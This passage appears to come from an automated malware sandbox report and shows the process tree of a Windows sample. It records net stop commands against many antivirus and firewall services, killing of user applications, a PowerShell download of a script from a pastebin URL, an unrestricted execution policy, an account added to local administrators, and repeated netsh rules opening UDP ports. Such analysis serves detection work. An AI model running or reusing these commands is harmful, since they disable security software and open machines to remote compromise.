C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:1932
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:3852
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵PID:4024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵PID:2392
-
-
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵PID:1984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵PID:3980
-
-
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵PID:5068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵PID:1096
-
-
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵PID:3192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵PID:1048
-
-
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵
- System Time Discovery
PID:3116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵
- System Time Discovery
PID:1176
-
-
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵PID:1532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵PID:4328
-
-
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵
- System Time Discovery
PID:3216 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵
- System Time Discovery
PID:4092
-
-
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵PID:3596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵PID:3184
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:4660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:2896
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵PID:2344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵PID:1876
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵PID:4576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵PID:4800
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵PID:1724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵PID:4188
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵
- System Time Discovery
PID:840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵
- System Time Discovery
PID:1488
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:4868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:260
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵PID:1732
-
-
-
C:\Windows\system32\net.exenet stop netsvcs2⤵PID:1588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵PID:4176
-
-
-
C:\Windows\system32\net.exenet stop spoolnt2⤵PID:3932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵PID:3428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵PID:1124
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3668
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4756
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1032
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4672
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2780
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5032
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3192
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1532
-
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:4016
-
-
C:\Windows\system32\tskill.exetskill iexplore2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4424
-
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3676
-
-
C:\Windows\system32\tskill.exetskill excel2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2156
-
-
C:\Windows\system32\tskill.exetskill iTunes2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4132
-
-
C:\Windows\system32\tskill.exetskill calc2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2332
-
-
C:\Windows\system32\tskill.exetskill msaccess2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1932
-
-
C:\Windows\system32\tskill.exetskill safari2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
-
C:\Windows\system32\tskill.exetskill mspaint2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1224
-
-
C:\Windows\system32\tskill.exetskill outlook2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1160
-
-
C:\Windows\system32\tskill.exetskill WINWORD2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3764
-
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1996
-
-
C:\Windows\system32\tskill.exetskill firefox2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4936
-
-
C:\Windows\system32\tskill.exetskill LimreWire2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵PID:568
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:4784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:2476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:2320
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:864
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1964
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1160
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2464
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1984
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3324
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3500
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4336
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:5036
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:864
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:916
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2540
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2112
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2260
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4988
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:4024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:428
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3324
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4988
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2112
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1468
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2316
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1368
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:228
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1920
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:5036
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:3456
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3088
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1420
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:656
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:1588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:4348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4176
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2008
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4900
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3500
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1388
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1744
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3820
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:1420
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1644
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:2832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:1260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:3584
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3612
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3456
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4360
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3104
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:2632
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1328
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:260
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2476
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:5036
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1384
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2528
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:248
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:1876
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1460
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4500
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2828
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3612
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1460
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:2280
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1984
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:72
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4164
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:2956
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3132
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:4176
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3900
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:4980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
